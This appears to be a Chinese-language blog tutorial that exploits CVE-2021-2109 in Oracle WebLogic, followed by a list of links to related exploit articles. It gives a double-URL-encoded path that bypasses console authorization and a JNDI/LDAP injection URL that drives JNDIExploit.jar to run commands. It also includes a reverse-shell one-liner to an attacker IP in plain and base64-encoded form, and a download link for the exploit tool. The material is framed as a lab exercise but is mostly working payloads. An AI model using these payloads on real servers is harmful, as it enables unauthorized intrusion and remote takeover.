Weblogic未授权访问以及LADP远程代码执行(CVE-2021-2109)
零基础学黑客,搜索公众号:白帽子左一
作者:掌控安全-逍遥子
1.影响版本:
WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
实验环境:
攻击机:kalilinux 10.1.1.10
靶机: 10.1.1.109
2.weblogic未授权访问:
对目标地址的7001端口直接访问
构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%252e%252f是…/的二次url编码。成功访问到控制台,如果第一次未成功需要进行刷新。
此处存在weblogic的未授权访问,该版本受到影响。
3.远程代码执行
a.
启动需要攻击使用的ldap脚本 java -jar JNDIExploit.jar -i ip
下载地址:github的链接已经失效,我放在附件的位置。
配合WebLogic未授权漏洞进行代码执行:
/console/css/%252e%252e/consolejndi.portal_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.1.1;110:1389/Basic/WeblogicEcho;AdminServer%22)
注意:使用ldap的第三个分隔符使用的是;,不是.
构造一个传参为cmd,即为我们执行的命令。
b.
另外开启一个终端,运行漏洞的poc。设置响应的参数,看到成功执行,并且获取到了shell。
c.利用漏洞生成反弹shell。
将bash反弹命令bash -i >&/dev/tcp/10.1.1.110/6666 0>&1进行base64编码转换:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTEwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
然后使用nc对本地的端口进行一个监听。
成功获取到shell
链接:https://pan.baidu.com/s/10DyEYAFrCbtQ5wKTAy_7-g
提取码:zkaq
Weblogic未授权访问以及LADP远程代码执行(CVE-2021-2109)相关推荐
- 二十八种未授权访问漏洞合集(暂时最全)
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...
- 常用的30+种未授权访问漏洞汇总
未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...
- JBoss未授权访问漏洞Getshell过程复现
文章目录 前言 漏洞复现 漏洞描述 靶场搭建 漏洞利用 防御手段 Jexboss脚本 前言 在 2021 年第五届强网杯全国网络安全挑战赛的 EasyWeb 赛题中遇到了 JBoss 未授权访问漏洞 ...
- Jenkins未授权访问
Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流.默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一 ...
- Gitea 1.4 未授权远程代码执行漏洞复现
Gitea 1.4 未授权远程代码执行 一.漏洞描述 Gitea是从gogs衍生出的一个开源项目,是一个类似于Github.Gitlab的多用户Git仓库管理平台.其1.4.0版本中有一处逻辑错误, ...
- CVE-2021-30461 - VoIPMonitor未授权远程代码执行漏洞
VoIPMonitor未授权远程代码执行漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042 测试代码执行 0X005 PO ...
- Docker远程API未授权访问导致的Docker逃逸
Docker远程API未授权访问导致的Docker逃逸 前言 是给社团学弟学妹们一次讲课的一次md. 服务器 https://cloud.tencent.com/act/campus 当然想要复现学习 ...
- 通达OA未授权任意文件上传及文件包含导致远程代码执行漏洞
0x00 前言 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台. 0x01 漏洞简 ...
- Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)
漏洞简述 2019年4月17日,CNVD 发布<关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告>,公告指出部分版本WebLogic中默认 ...
最新文章
- Java 理论与实践: 正确使用 Volatile 变量
- 《精通Nginx》——1.2 从源代码安装Nginx
- 惠普搜客户机t5740升级硬盘_惠普暗影精灵5首测重磅来袭:更多选择 更强性能...
- Git 使用篇一:初步使用GitHub,下载安装git,并上传项目
- python换行输入数据_python将回车作为输入内容的实例
- 使用ADF BC管理保存点
- m_Orchestrate learning system---二十二、html代码如何变的容易
- sql 查询所有数据库-表-表结构
- html5 调用高德地图,高德地图在h5项目中的集成(点标记)
- Mysql中循环拼接参数_利用循环向数据库中插入数据,参数重复的问题
- 【ArcGIS|空间分析】查找成本最低路径
- js调用摄像头拍照上传图片
- Arduino AT24C02详解读写地址位
- 金蝶服务器选项没有账套信息,金蝶财务软件帐套属性设置保存和帐套启用报错的解决方法...
- 为Springboot工作流版本myabaits的xml 建表
- 视图之模板赋值和模板渲染
- linux bt 命令行,在Linux终端下进行BT下载
- POJ 2248【加法链】
- Java+Swing+mysql用户信息管理系统
- SQL优化之六脉神剑
热门文章
- JavaWeb实现一个在线信息发布平台网站
- Blender基础入门(2):Blender简单渲染
- URLEncoder.encode转码GET请求参数
- 文件比较工具-BCompare的简单使用
- 碳纳米管包四氧化三铁Fe3O4纳米粒子|氧化石墨烯包覆Fe3O4空心球纳米复合材料(r-GO/Fe3O4)|齐岳
- Ranger 编译安装
- 微信access_token如何保存
- java8 嵌套循环_Java 8嵌套循环流
- AVT工业相机Windows、Opencv开发——相机的配置
- Kubernetes入门教程 --- 使用二进制安装